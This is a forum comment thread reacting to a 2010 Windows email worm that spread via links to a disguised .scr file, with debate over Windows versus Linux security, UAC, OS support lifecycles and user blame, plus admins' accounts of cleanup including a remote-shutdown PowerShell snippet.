I don't know of a Linux equivalent to this attack. No Linux desktop will download and execute a file when you click on a link. No linux desktop will even let you execute a downloaded file unless you first right-click on it and set the executable bit. And even then it will only run as the user. And even code running as the user won't have access to the users passwords, since they are encrypted.

It's not all roses, of course. GNOME .desktop files will execute even without the x bit set, annoyingly, though I think they are planning to change that. And as you say being limited to the one user is good, but not good enough for the user whose files got hosed.

Re:Three things

[jcupitt65]

GNOME .desktop files will execute even without the x bit set ...

I checked again, and it sounds like this has been addressed. Phew!

https://wiki.ubuntu.com/SecurityTeam/Policies#Execute-Permission%20Bit%20Required

Re:Three things

[Sycraft-fu]

Go and look it up. Support doesn't end the date a new OS comes out. You are correct in that older MS OSes were not always supported for 10 years (that is a new policy, starting with Windows 2000). However NT4 supported for 4 years? Not hardly, it was supported until 2004 (released in 1996). Windows 2000 was supported until July 13 2010 (released in 1999). Windows 95 was supported for much less than 10 years, but more than 3. It was released in 1995, of course, and supported until December 2001.

Remember: Supported doesn't mean "On store shelves." Supported means that they release security updates, test compatibility, offer enterprise support, and so on.

For Windows 2000 on, they pledge 10 years from date of release, 5 years mainstream support (meaning service packs and feature updates) and 5 years extended support (meaning mostly just security updates). This can be extended, of course. It was extended a bit for Windows 2000 and a lot for Windows XP.

Remember that in the real world, what we care about for support is the ability to have something operating on the Internet safely. That means it needs to be actively patched. THAT is what support means. Yes, I know you can still run old OSes. You don't even need old hardware, a VM will do nicely. However those are unsupported as in not patched, not safe for Internet use.

Same deal with Ubuntu and their LTS releases. What they are saying there is "We'll support this particular version for longer." Normally Ubuntu only supports a version for 18 months, and they release a new one every 6. So they only guarantee patches for 18 months from date of release. Doesn't mean there's not a new, patched, version to move to, just that you have to move to the new one. The LTS releases they support for longer, 3 years for a desktop 5 for a server. The new versions continue to come out, however they keep patching those LTS versions actively, hence they are supported.

That is what support means in this context. If it doesn't matter to you that's fine, understand that it matters to enterprises. We are interested in not having our shit get hacked.

Re:Three things

We are interested in not having our shit get hacked.

Quite ironic, then, that you're posting in response to "New Email Worm Squirming Through Windows Users' Inboxes".

Yes, I'm laughing at you, while you're waving arms about 10 year support you can't even keep today's worms and viruses out. You couldn't keep out yesterday's, and you won't be able to keep out tomorrow's. There's so much fail I don't know where to begin.

And before you go blaming stupid users for everything again, explain why none of this happens to other OS's. Explain why Windows has a 100% monopoly on viruses and requires antivirus software. Really, go on, this will be amusing. I'm wondering if you'll take the stance that only Windows users are stupid enough to cause these kinds of problems.

Re:Three things

[cusco]

Mac and Linux worms have both been demonstrated, but they're such a small portion of the market that no one bothers. Additionally, the tools for writing worms/bots/malware for Windows systems already exist and crackers are accustomed to them. Why would they want to spend the time and energy creating and learning new tools to attack five percent of the market?

Re:Three things

[drsmithy]

Windows 95 was supported for less than 3 years.

False. Windows 95 support ended December 31, 2001.

Windows NT was only supported for 4 years.

False. Windows NT (4.0, I assume you mean) ended June 30, 2004.

Windows 2000 was only supported for 5 years.

False. Windows 200 support ended July 13, 2010.

Windows XP has only been supported for this long because Microsoft screwed the pooch.

False. Windows XP's support lifecycle was only marginally lengthened from the one it had on the day it was released.

Re:Three things

[drsmithy]

Do you know how Linux and Unix systems work? One of the reasons that viruses do not infect them the same as Windows is that it requires privilege escalation to do any real damage.

Please define "real damage". Because I am well aware of "how Linux and Unix systems work" and I can't think of many things malware might want to do that it requires elevated privileges for.

And if memory serves me correctly, a user sometimes doesn't need to actually download or run something in Windows to execute malicious code. Remember the Windows shortcut exploit that was released less than a month ago? In that case, it didn't matter if the user was clueless or not.

These are called exploits. They happen on all platforms.

Social engineering

[Acetylane_Rain]

There's a confusing reference to "containing malicious executables" in the first sentence of the summary, which appears to be a nearly direct quote of the first few paragraphs of the article itself. However, the emails only contain a "link" to the malware, which, of course, is less exciting news, since that's what some s(p/c)ammers already do. (To be sure, this is corrected in the second sentence which mentions the "messages contain a link" to the file.) This is a two-stage browser-based attack, which uses social engineering via email as its point of entry.

Incidentally, the link to the article is to a site hosted by a anti-virus vendor, rather than an independent security company. So take it all with a grain of salt or puff of powder.

it's comcast they can't even get cable right at ti

[Joe+The+Dragon]

it's comcast they can't even get cable right at times and they still have a hard time with people in the call center getting info to the cable guys. Try asking for a cable card or if you want some fun tru2way.

they wouldn't care anyway

I'm in a position where I am here to help people with their workstations. Basically it is a, "put out fires" situation. I could tell people about this latest issue with Microsoft products, but the reality is, they wouldn't listen anyway. Of course, if they listened, they wouldn't have Outlook on their PC's in the first place.

some stuff does not need admin to take over the sy

[Joe+The+Dragon]

some stuff does not need admin to take over the system even more so when it uses old windows 3.1 or 9x holes that are still in XP, vista and 7.

The old code is not holes but old printing or other sub systems that are not in use any more but the code base that that old system used is still in the windows code base.

Worm? No

[nurb432]

Trojan, yes.

Worms don't need human intervention to spread. ( technically, neither do viruses )

Re:Worm? No

[Torodung]

"Morris" wants a word with you.

Re:Worm? No

[gsgriffin]

True. Trojans do require people to apply them and can be quite effective in penetrating the defenses....

wait a second...what are we talking about?

Not a worm...

[TrancePhreak]

This is a merely a trojan. A real worm would infect other machines without intervention.
http://en.wikipedia.org/wiki/Computer_worm

Re:Not a worm...

The cross-host propagation makes it a worm. The article you linked to says:

it *may* do so without any user intervention

Re:Not a worm...

If it reproduces with the help of a biological host, it's a parasite.

Re:Not a worm...

Bingo, and so sad this comment wasn't made earlier. This is slashdot people!

Windows XP is still "in use in 2010"

[tepples]

And guess what-- the "in 2010" comment doesnt really apply to an OS from 2002, does it?

The question was "Are there really operating systems in use in 2010". Windows XP, despite that it is a major version back, is still "in use in 2010", especially on older or subcompact hardware on which Windows 7 would underperform.

Re:Windows XP is still "in use in 2010"

My company is still on XP for the vast majority of users - Vista really bothered the Desktop/Infrastructure guys, so they chose to wait, and even though Windows 7 has been out a while, they just haven't wanted to deal with the hassle and expense of upgrading everyone. I think they may be waiting 'till everyone's on a downgraded Win7 license so it will just be the hassle rather than the expense part.

As a desktop user, I ~like~ Windows XP, if I wear my old (semi-retired) SysAdmin hat, I think I'd like my users on Windows 7.

Posting anon so as not to identify/embarrass my employer

"Download"?

[LambdaWolf]

...the messages contain a link to a site that will download a malicious file to the victim's PC.

Shouldn't it be that the site uploads a file to the PC, while the PC (or the worm itself) downloads it? I know the distinction is lost on the vast majority of users these days—which is a shame, since the concepts of "sending" and "receiving" are important enough to distinguish—but c'mon, this is Slashdot.

Re:"Download"?

Download means the direction of the data transfer is from the server, the one that listens, to the client, the one that initiated the connection.

Re:"Download"?

[Confusador]

Misplaced modifier there, so I don't think it's so much technically wrong as grammatically wrong, and, hey, this is Slashdot! It's not a "link to a [site that will download]", it's a "[link to a site] that will download". The link is the actor, not the site. It would be more accurately worded "contain a link that, when clicked, would cause a malicious file to be downloaded...", which is a bit more cumbersome than is needed here.

Re:"Download"?

the link downloads the file, the site does not. This is slashdot; grammar constructs are important enough to distinguish.

Re:"Download"?

I know what you mean. Every time I hear someone say 'upload' when they mean 'download' and vice versa I have to stop my suddenly itchy hand from slapping them.

Fits right in there with idiots saying 'log on to our website' when they mean 'visit our website'.

SLAP!

Re:"Download"?

Clicking the link causes the file to be downloaded by the PC. At the expense of being verbose the phrasing could have been clearer.

It's not

[Sycraft-fu]

The problem is that Mac/Linux users loved to bang on about this as a reason their OSes were more secure. "Oh asking for an admin password protects us." Of course it doesn't, you still have to know what you are doing but there you go. So then Windows got it too. Well now this is a problem, you can't claim it as an advantage anymore. What's more, Windows does it right, it is true privilege separation, and it doesn't cache it like a number of Linuxes do (you sudo in the GUI and it stays that way for 10 minutes). So what to do? Oh, well attack it from asking too often, of course! Never mind it only asks for, you know, things that actually require access. It is still too often!

Some people just have a mindset that their OS is Superior and Windows is Inferior. Thus they'll come up with whatever justifications it takes to convince themselves of that. It isn't about facts, it is about a belief they are trying to justify.

Also to the people who think admin gets asked for too much: Please remember that anything that doesn't need admin to do, a virus/spyware can do without that admin. So if a program can be installed without admin (and it can actually, just only to that user's account, not system wide) then a virus can be installed without admin. There is no half way, you can't have something that only a legit program can do that a virus needs admin for. Something either does or does not require admin. Period.

Re:It's not

[wvmarle]

It has been a long time that I had to enter my root password in the gui for some software, and that was only for installation. And as such when expected.

Windows I haven't used for more than a decade, but it seems that many many programs routinely ask for privilege escalation. Often unexpected. And users do not even have to enter a password, they just have to click . Have them enter their password all the time and they would at least get more annoyed, and that may also cause software to be fixed.

Software that a user downloads in Linux can be run by that user, sure. It can do lots of bad things that way, sure. However what it can not do is install and hide itself into some system directory, making detection and cleaning an infection much easier on Linux.

And that is not even looking at the many many security bugs that are still present in Windows.

A big difference of course remains that Unixes have been set up from the ground up to be networked and have various users with various permissions. Windows has got this patched on later, having to deal with a huge legacy of all kinds of apps that didn't expect these restrictions. It's not just because that many people here on Slashdot would suggest MS to throw out what they have and start from scratch, just like Apple did. OS-9 had become a mess. Insecure, buggy, unstable, unmaintainable. So they started anew, and very successful.

Re:It's not

[Sycraft-fu]

Here's the thing you forget: If software can do X without needing a password, so can a virus. If you can install software on your system with no password that can access your data, get out and communicate on the network and so on and never ask for a password, so can a virus. There's no "evil bit" that the OS can check for to only allow software that is nice to do that and require admin in other cases. The only thing it can't do is infect the entire system (unless there's an exploit).

Ok the problem is if that seems like good security to you, you are being narrow minded. You are thinking of all systems as being servers which is not at all the case, and I'm sure is not the case of the computer you are using.

I've recovered a lot of desktops in my time working in computers. Failed disks that the person didn't back up, virus infestations, users just doing stupid shit. Whatever the case the system goes asplode. You want to know what they care about in EVERY case? Their data. That is all. They want their documents, their e-mail, their stupid background picture. That is -IT-. They don't give a shit about the system itself: not only can it be reinstalled, it WILL be reinstalled. They just want the data.

So if you think that not having to escalate privilege when you install apps means you are protected, it means the precise opposite. It means that any of those apps you normally use could be evil and you'd never be the wiser. They could take out all your data, hose everything right up, and never ask for a password. Oh sure, you could log in as root and remove them, but to what end? I don't care if I have to reinstall, I care if I lose data.

Linux types have really talked themselves up that they have this amazing system security that just doesn't exist. Everything I hear is just like your post: A bad misunderstanding of what is actually important, and how systems actually work. You keep thinking in a server mindset, where the system matters more than a user's data. That just isn't the case on desktop systems, which is what we are talking about here. Also, here's news: On a server, when you wish to install software for all users, you DO have to become root. We do it all the time at work for our shell servers. We have software X that everyone needs. That means it has to be installed system wide, that means root.

FYI Windows works the same way. In our labs, users don't get admin access. As such they can (and occasionally do) hose their accounts/data, but the system itself is fine.

Re:It's not

[Missing.Matter]

I'm sorry, you readily admit that you haven't used Windows in 10 years, yet you're making assertions about a version released 11 months ago. Where are you gaining this insight?

It has been a long time that I had to enter my root password in the gui for some software, and that was only for installation. And as such when expected.

That's the default behavior in Windows 7.

It it seems that many many programs routinely ask for privilege escalation. Often unexpected.

It seems? So you're basing these comments off of something, rather than blowing hot air? I would love to see some examples of these mysterious and unexpected UAC prompts. SInce you've never used Windows 7, I'm sure this will be a hard request.

And users do not even have to enter a password, they just have to click . Have them enter their password all the time and they would at least get more annoyed, and that may also cause software to be fixed.

What's the difference? So they have to click instead of entering "123" and you've slowed them down a 10th of a second. And seriously, this is the Linux user's solution to a user problem? Modify the behavior by making the UI a pain in the ass and pissing the user off? No wonder no one uses your OS.

However what it can not do is install and hide itself into some system directory, making detection and cleaning an infection much easier on Linux.

I'm sorry, root can do absolutely ANYTHING to a Linux machine. If a user is convinced (through way of enticing screensaver) to give a malicious piece of code root access, what exactly is stopping it from destroying the system? Also for most users destroying home is equivalent to destroying the system.

And that is not even looking at the many many security bugs that are still present in Windows.

Because we all know Linux is bug free

OS-9 had become a mess. Insecure, buggy, unstable, unmaintainable. So they started anew, and very successful.

If you had even bothered to use Windows 7, you wold know it's stable, fast, secure, and a pleasure to use. At least that's the general consensus. Of course you should actually, I don't now, USE the software before you critique it. I still can't believe you're basing these assertions from your experience with pre-SP1 XP

Re:It's not

[wvmarle]

Of course, I know data is the most important, that's what computers are meant to handle. Second most important is a computer that works reliably. And that's why I backup /home. And large parts of /var (where a.o. the imap base lives, together with lots of other important data) and /etc. Also for availability /var and /home are on a raid1, that saved me once already when one of those disks died.

Re:It's not

[StuartHankins]

And yet OS X and Linux systems don't have any viruses. You're splitting hairs and missing the point. Results speak volumes.

Re:It's not

[MrSenile]

It seems? So you're basing these comments off of something, rather than blowing hot air? I would love to see some examples of these mysterious and unexpected UAC prompts. SInce you've never used Windows 7, I'm sure this will be a hard request.

I find a lot of games and some applications (mostly window tool applications like spybot search & destroy) always brings up the UAC. It'd be nice to be able to tag it saying 'yes, I know this application will bring up this prompt, now ignore this one application' without having to raise or lower the security operating system wide, but that's my personal beef with Win 7.

What's the difference? So they have to click instead of entering "123" and you've slowed them down a 10th of a second. And seriously, this is the Linux user's solution to a user problem? Modify the behavior by making the UI a pain in the ass and pissing the user off? No wonder no one uses your OS.

And I'm assuming you've used this OS to compare what he's saying or are you taking someone else's word for something without first hand experience? You know, like you've accused the other guy of doing? Just curious.

I'm sorry, root can do absolutely ANYTHING to a Linux machine. If a user is convinced (through way of enticing screensaver) to give a malicious piece of code root access, what exactly is stopping it from destroying the system? Also for most users destroying home is equivalent to destroying the system.

You've obviously not used Linux. LIDS, ACL's, SELinux, and many other tools, including, but not limited to chroot jails, allows you to lock down a system, even from root, from specific areas. While I'm sure Windows has similiar 'tools', especially in a networked environment where you can set up security policies, the fact that you said Linux can be configured to allow 'root to do absolutely ANYTHING to a Linux machine' is a fallacy and you need to retract that statement. Your opinion is flawed. Perhaps because like you accused someone else, you've not used Linux enough to draw conclusions?

Because we all know Linux is bug free

This was a stupid statement. Nothing is bug free. You're obviously trolling, but at least Linux seems to address bugs, generally (but not always) faster than the Windows counterpart. And yes, there's several links to confirm that, and no, I'm not going to bother repeating other slashdot topics to feed you.

If you had even bothered to use Windows 7, you wold know it's stable, fast, secure, and a pleasure to use. At least that's the general consensus. Of course you should actually, I don't now, USE the software before you critique it. I still can't believe you're basing these assertions from your experience with pre-SP1 XP

Oh agreed, it's more stable than XP, but as I've had it bluescreen a few times, sometimes with similiar screens as XP (like the NOT_LT_OR_EQ bs), or have explorer crash on me asking me kindly if I want to send the bug report to Microsoft (I do of course), the fact your global comment of 'stable' is flawed. More stable than XP, yes. Stable globally? No.

Fast, yes, it's faster. But on the same hardware that XP ran 'fast' on it's actually a touch slower. It needs better video and better CPU to actually run 'faster'. Does this obviously by better threading, better memory management, and streamlined I/O. Only took them 20 years to do it right (or at least 'better'). So while overall, yes, it IS faster, this is also bias based on the hardware you run it on.

Secure? The security is about equal to Win 2008 server for security, which while a great improvement over other windows, is still, frankly broken at the object layer allowing viruses (like flash viruses, email viruses, etc) to propigate quite nicely. The fact that other operating systems have less (or no) real viruses, while enjoyable, is moot. The fact is Windows still does, thus, shoots th

Re:It's not

[WuphonsReach]

I would qualify that as "And yet OS X and Linux systems don't have many viruses.".

There's a few reasons for that:

- Lack of market penetration.
- Hackers typically work on what they are familiar with, which is generally Windows.
- Better default out-of-the-box security (not running as admin, mostly).

Back in the bad old days, classic Mac OS was a badly designed system that was easy to infect (similar to Win95/Win98 design). I encountered numerous Mac OS viruses / trojans back in the late 80s and early 90s.

Outlook

[Witmar]

Who uses software based e-mail anymore? you can't access it from every where

Re:Outlook

[turbidostato]

"Who uses software based e-mail anymore? you can't access it from every where"

Uhhh... me. Are you still using only snail mail or is it that your e-mail clean is working out of fairy dust instead of ones and zeroes?

And no I can't access my e-mail from every where, I still need a computer-like device to do it. Do you access your e-mail by direct brain connection?

Evolution

[Duree]

This is why I don't click on links I don't know. And why I don't use Outlook! Those that still click on unknown links may deserve what they get. Just saying.

FLAMEBAIT article!!!!!!!!1one Windows is so secure

[Requiem18th]

Slashdot must be soo freetarded for pointing out that that this Windows worm only infects Windows!

Because Windows is just as secure as Linux/Mac!

It must be so because I got modded flamebait last time I suggested Windows was more virus prone than alternatives. /rant

Ok rant time over, it's because of shit like this that botnets will never case to exist. It's like the PDF madness with Adobe, they took the simple task of sending files over email and somehow convert it into a security nightmare. Couldn't they just mark it as non executable by default?

Experiencing it here...

[maugle]

We're seeing it at our workplace, many times over. At first, the dumbasses kept hitting "Reply All" (and sending the message to everyone) saying "I wasn't expecting anything, did you send this e-mail to the wrong person?". Now the dumbasses are hitting "Reply All" saying variations of "Don't open, it's a trojan", "I think this is a virus", and (my favorite) "Stop hitting 'Reply All', you're filling up my inbox!".

Depends on Who Patient Zero Is...

[IonOtter]

I got one of these at work.

The reason it didn't nail my machine is because...

1. I have HTML disabled on Outlook
2. I never click ANY links that go outside the company.

I did a quick search on the URL, and it led me to Slashdot in the Google results. Yay Slashdot!!

But here's the catch? Someone INSIDE the company *did* get hit, and it spread from their address book to everyone else. That's the usual progression, of course, but the source and headers actually made me look twice.

ALL of the headers, everything, came from inside the company firewall. I could see where it passed through at least 3 firewall systems to get to me.

When I spoke to network security, they said they'd been fighting it since noon. The reason why is because people are actually READING THE HEADERS and checking the user, and it's coming up legit!

The folks on our end are actually doing due diligence, they're just not paranoid enough.

Re:Depends on Who Patient Zero Is...

[webheaded]

All of this is rather pointless since, if you actually hover over the link, you can see the link that you see isn't actually the link. My work got hit and I hovered over and saw it was a .scr file. It was kind of hilarious knowing who clicked it because they all had notes on their computers saying not to use that computer and they all had to move to another desk. Idiots.

One of the managers came over to me and I was like "who would even click that?!" at which point someone ran over and immediately said "I clicked that link and..." Yeah. "You'd better go call desktop services and see what they want you to do." :p

Re:Depends on Who Patient Zero Is...

[cbhacking]

You know, all that due diligence makes perfect sense right up until you get to the fact that the "document" or "picture" you were sent isn't actually a PDF or image, but a .SCR - a PE-format executable binary. Windows will bitch at you about 3 different ways if you try and run one of those off the web, and the simple fact that it didn't just open in Adobe Reader should be more than enough of a tip to click no.

Personally, I suspect the people at your office are simply lying about checking the headers and all to try and look less retarded. It seems to have worked on you.

I gotta say

[FranTaylor]

I'm pretty impressed with my employer's IT operations because I toiled away all day today, blissfully unaware that any of this was going on. Not a single email, no nuthin.

Dealing with this mess...

[don_carnage]

We had to deal with this mess today, running around to PCs and flat-out shutting them off. One user that I came across clicked on the link because he "verified that it was from someone in the office." His Outlook outbox had over 34,000 emails ready to send. Quite a mess and we're still cleaning it up. I thought we had learned our lesson with the "I Love You" virus. What's worse is that the spam filter, IPS, Windows firewall, antivirus, and web proxy all failed to stop the attack.

Re:Dealing with this mess...

[turbidostato]

"We had to deal with this mess today, running around to PCs and flat-out shutting them off."

Somehow this doesn't happen to appear on the Windows vs Linux TCO studies from Microsoft.

Re:Dealing with this mess...

[aarner]

More troubling, why does no one ever demand some friggin' accountability from those criminally incompetent "security" vendors. This worm is not some brand-spankin-new, just-released-today threat. The first entry in microsoft's web site for Worm:Win32/Visal.A can be found here http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Worm%3AWin32%2FVisal.A - It went up on August 4 2010 and was updated on August 19 2010. The full text of the email can be found at that site, as well as a list of infection symptoms, spread vectors, and URL patterns of the payload. My own employer spends millions of dollars per year on websense to keep me safe from gmail and youtube, symantec A/V to keep me safe from 30% of my laptop's performance, and a myriad of other safety and security products.

You'd think that a firm like webNonSense would have the resources to add the payload sites to their list of "naughty" websites. Although it would be a pretty big undertaking for them, after all the worm/trojan does have a huge set of THREE FUCKING URL PATTERNS that it uses to link to the payload. That's a pretty tall order to keep track of 3 whole URL patterns. For example, they start with sharedocuments.com/ and end with Something_BunchOfNumbers.PDF.scr. Like, someone might have to learn how regular expressions work or something - that's time taken away from webNonSenses' primary mission of keeping corporate america safe from boobies. I don't know what WebSenses' slogan or tagline is, but given that it only seems to work on static porn sites that have been around for years, maybe they should think about changing it to "WebSense - Tits or GTFO!"

You'd think that if the idiots at Microsoft Security Essentials had found this in the wild six weeks ago that our friends at McAfee/Intel and Norton/Symantec would have rolled out a definition file that immunized against the infection already.

You'd think that the Microsoft Security Essentials idiots would talk to the Microsoft Exchange retards and maybe block the emails at that level. Or maybe they'd block it at the browser level - fit it into the several terabytes or so that counts for an InternetExploder install these days.

Incidentally, for the fun of it I fired up a Windows VM and logged on to the corporate exchange server this morning after reading about this. I clicked on the link and you'll never guessed what stopped the infection - Good old Firefox threw up the warning. Not the AV software, not websense, not UAC - but firefox caught it on the download/check for virus step.

So the product with the least responsibility for the save actually saved the day. The best description of the performance of websense, symantec, mcaffee, etc can only best be described as: "They shit the bed."

Antivirus and security software doesn't work. It never will work. So long as the mindset of security is default permit or blacklisting, this kind of thing will happen again and again. If any good can come of this, it would be the SEC hauling symantec and mcafee and the rest of them off for perpetrating a massive fraud on nearly eveyone.

Re:Dealing with this mess...

We had to deal with this mess today, running around to PCs and flat-out shutting them off

Wouldn't it have been easier to rush to the circuit breaker and pull down the lever that says "Main"? ...just saying

Re:Dealing with this mess...

[jpmorgan]

What, you think replacing Windows with Linux is magically going to grant its user 20 IQ points?

Re:Dealing with this mess...

[turbidostato]

"What, you think replacing Windows with Linux is magically going to grant its user 20 IQ points?"

I think that, at the very least, the grandparent wouldn't need to "run around to PCs and flat-out shutting them off": he could have done the same from the comfortability of his chair and the aid of ssh.

Re:Dealing with this mess...

We had to deal with this mess today, running around to PCs and flat-out shutting them off

Would it not have been easier to go to the circuit breaker box and pull down the lever labeled "Main"?...I'm just saying

Re:Dealing with this mess...

[cbhacking]

You don't even need SSH to do this in Windows; a domain administrator can use
shutdown /m
to remotely shut down any machine on the network. They could also remote desktop in and do it. Or they could kill your connection / blacklist your computer at the router. Or they could just tell you to turn the damn thing off yourself.

If your IT guys are so stupid they're running around physically pressing power switches, they're at least as technologically idiotic as people who run as Admin and run executable files linked to in email.

Re:Dealing with this mess...

[Spad]

A smart Windows desktop administrator (Running Windows 7/Server 2008 R2) can use:

ipmo activedirectory
foreach($computer in $(Get-ADobject -filter 'objectclass="Computer"' -searchbase "[OU with all your computer accounts in])){
shutdown /s /f /m $computer
}

Or the 50-line VBScript counterpart.

Re:Dealing with this mess...

[jimicus]

Are you aware that there exist mail filtering programs that check any links and disarm those that look like they point at something dodgy?

Re:Dealing with this mess...

[jimicus]

If your IT guys are so stupid they're running around physically pressing power switches, they're at least as technologically idiotic as people who run as Admin and run executable files linked to in email.

Hate to say it, but IME a significant number of IT guys are that stupid.

Usually, the excuse given (and I still think it's a lousy excuse) is that they're run off their feet so solidly for 8 hours a day that they literally do not have time to spend 30 seconds Googling for a way to make their life just a little easier. Myself, I think that's bullshit - they'd probably recover a couple of hours every day with that 30 seconds - but hey, what do I know? All of this is going on and I'm replying to /. rather than cleaning up a horrendous mess.

Re:Dealing with this mess...

[don_carnage]

The main point of physically visiting each machine was to leave a note stating, "Do not turn on this machine until further notice." It's all fine and dandy that you shut them down remotely, but how do you prevent the user from coming in the next day and turning the machine back on?

Re:Dealing with this mess...

So can Windows...any novice to the command prompt should know that shutdown.exe can remotely shutdown computers.

Re:Dealing with this mess...

While you're ssh'd in, disable their user account.

Re:Dealing with this mess...

...I don't think Linux uses CRSS.exe, so in his case it would have made a considerable difference.

Speak for yourself

"You normally think of PDF's as safe."

Maybe you do, but the sane computer folks have been treating all PDFs == EXEs in terms of malware for awhile.

How well does that work for all software?

[Joe+The+Dragon]

as some software wants to update useing it's own build in systems or it's own updater exe?
Some software needs to do some Registry / file systems stuff per user for that users first time run.

Some DRM systems need admin to run right.

What about the apps that need to run as admin to work right and running it as them "themselves" will not work?

For some of that newer software is coded to work with UAP but lot's of older apps are not.

Users come and go

[syousef]

The actual reason is that the users still haven't learned from the last 9 years of experience.

Some users weren't around 9 years ago. Making it sound like users are all stupid may be popular here but it's childish. There are lots of reasons why a user may not know better or may slip up. You need education, not blame.

Re:Users come and go

[causality]

The actual reason is that the users still haven't learned from the last 9 years of experience.

Some users weren't around 9 years ago. Making it sound like users are all stupid may be popular here but it's childish. There are lots of reasons why a user may not know better or may slip up. You need education, not blame.

I agree. The last 9 years of the most basic and easily-understood aspects of security history would be included in even the shoddiest education about this subject.

What's stupid is using what you do not understand and are not actively learning about, while also thinking that nothing bad will ever happen.

Re:User & Admin Retards

[IonOtter]

User retards:
- What retard still uses Outlook?

You use what the company tells you to.

- What retard still opens exe files it receives in e-mail?

This wasn't an .exe file. It was a .scr file that was encapsulated in HTML to make it look like a .pdf. If you had HTML enabled, you'd only see a .pdf.

- What retard still opens links it receives in e-mail?

If I wasn't a paranoid security-nut, I would have. It came from inside the company, from a legitimate user I'd been in contact with in the past. But because I'm paranoid and have HTML disabled in Outlook, I could see the REAL link going to someplace in the UK.

Admin retards:
- What retard still deploys Outlook/Exchange

Have you got something better that can support 150,000 unique email addresses in the United States alone???? Do you wanna add 100 additional countries to that, with all the additional email addresses? No, please! Amuse us. Tell us how wonderful your particular flavor of *nix is for taking care of such a big system.

- What retard still allows exe files to pass through e-mail?

See above.

- What retard still doesn't classify links in e-mails that point to shoddy domains as spam?

See above.

- What retard mounts a corporate home directory without the noexec flag?

That's what a zero-day exploit does. It finds a way around that.

- What retard still allows their users to run as root/admin?

See above.

- What retard allows a client computer to send more than 1 mail per second?

They're called "distribution lists". When the bad guys get inside, they work just as well for them as they do the user.

Mod Parent up -- finally correct definition

Mod Parent up --> finally correct definition

Those things are also computers

[dbIII]

You forgot that you CAN install software on those things - firmware updates. A spammer could make a fortune if they could convince a lot of people to install a hacked firmware, yet it has not happened.

so any spammer would have to exploit security bugs on the device

As they have to do on MS Windows. As I tried to say above the problem is not stupid users but stupid defaults. It should be as hard to get remote root on MS Windows as it is to get it on those modems.
I've heard the marketshare excuse since at least 1995 and there are more Mac and Linux desktops out there now than the total sales of Win95. It makes it look as if the excuse has zero value.

Re:Those things are also computers

[Pentium100]

You forgot that you CAN install software on those things - firmware updates. A spammer could make a fortune if they could convince a lot of people to install a hacked firmware, yet it has not happened.

First, the spammer would need to convince people that the device has a firmware and that the firmware can be updated. Without knowing the make/model of the modem it would be difficult to write a program that did that automatically (because the way firmware is upgraded is different for every modem), also, the firmware has to be model specific. I can't install a Linksys firmware on my D-Link DSL-500T, I doubt that the firmware from another D-Link ADSL modem would work.

I've heard the marketshare excuse since at least 1995 and there are more Mac and Linux desktops out there now than the total sales of Win95.

However, most of the Linux desktops are used by those who do not click on random things. Also, while the number is big, it still is small compared to Windows market share (Wikipedia says that in 2009 October it was 91%). So, now that I (hypothetically) decided to create a virus, should I target 91% of computers with a lot of stupid users, or 1% of computers with a lot of smart users? This is the same reason why less common devices do not have Linux drivers (the device is not common, so nobody in the Linux community wrote the driver and the manufacturer does not care about the 1% of potential users enough to create a driver that would work on the most common distributions). Also, that 1% is divided to a lot of distributions, most of which are not compatible with each other without recompiling the virus.

Running an unpatched system, misconfigured/no firewall, unneeded services, opening all attachments does not disappear when the user switches to Linux.

Re:Those things are also computers

[dbIII]

Running an unpatched system, misconfigured/no firewall, unneeded services, opening all attachments does not disappear when the user switches to Linux.

All of that does disappear since the defaults are:
1/ Automatic check for updates (MS Windows is doing that properly now too)
2/ Firewall set to only allow a few things by default and block the rest (once again MS Windows is catching up)
3/ Attachments do not autorun. That one is almost exclusively an application problem with the incredibly stupid behaviour of MS Outlook running everything even if a user wishes to delete it. The problem goes away on MS windows just by not using MS Outlook or configuring it properly (as I said STUPID defaults).

Re:Those things are also computers

[pandrijeczko]

Viruses spread because of a high population of similar operating environments and because that operating environment allows high-level access to the system.

Windows can be locked down very tightly such that anything a user does on a system is restricted to just the stuff they are allowed to do - but the problem there is that configuring it is complicated for the average home user, and no home user wants to have to keep messing around with those settings just because they need to temporarily open up permissions to, say, install a new application.

Likewise, corporate IT support people are far too busy and far too few in number to be able to deal with the plethora of support calls from users who need to install something or do something and therefore need some permissions changed temporarily. Consequently, the amount of Windows lockdown that happens in the corporate enterprise is a compromise between security & what your IT team has the capability to support.

Linux has some definite advantages in this area.

In the same way that 90% of PCs run Windows (or whatever the statistic is), if 90% of Linux users ran Ubuntu, then there is a relatively large population of users who are potentially running similar operating environments - however, Linux users are a mixed bunch of people running all manner of different distros with their own ways of doing things and their own list of applications that are installed by default. The chances of finding a single application to exploit amongst all those is minimal.

Additionally, by design, a UNIX-like OS has simpler but stricter permissions by default (which, I agree, are cumbersome if you need to create complicated permissions structures).

If you are a normal user on a system, then pretty much anything you run or do on a system can only ever damage the files that you own. (Yes, sudo and SUID allow for some exceptions of running stuff as another user, or as root, but likewise these are the first things targetted when anyone security audits a UNIX box, they're known security issues and therefore usage of them is minimised as much as possible).

An additional advantage of Linux, which doesn't really happen in Windows by default, is that if there's an app you need to install as a user, then a lot of time you can get away with not installing it (under root permissions) centrally on the server but do your own local install in your home directory. This means the application is run as you and cannot touch any files that aren't owned by you.

So it really comes down to the basic architecture of the OS and what you need to do to secure it. Home users of XP can immediately make themselves administrators on their systems and that means everything they do and run is with that level of permissions - Linux users can do the same if they wish but the first page of any Linux newbie manual or security document will always highly recommend doing as much as you can as a normal user and just change to root permissions when you really need to. (I know Vista and Windows 7 have brought in all this UAC stuff but I don't use either so cannot comment.)

Incidentally, this is not meant to be Linux zealotry. I personally use Linux more than Windows these days, but I do quite like XP and keep a copy handy for some must have apps and games.

Linux does have security dangers, these revolve around systems running daemons (services) that can be accessed and exploited by an external party - so whereas much of the security on Windows is focused around protecting against malware, on a Linux system security revolves around not running any services you don't need to and keeping the ones you do need up to date.

But even then, exploiting a Linux server usually has to be a directed attack by a human being or script against a specific daemon on a specific server; viruses on Windows just spread of their own accord to any available machine.

Re:Those things are also computers

[Pentium100]

The whole "can only access user files" thing is good if there is more than one user on that machine. If the computer is used by a single user, accessing user files is just as bad as root permissions (yes, the virus would be easier to remove, but can do just as much damage).

Linux users are a mixed bunch of people running all manner of different distros with their own ways of doing things and their own list of applications that are installed by default.

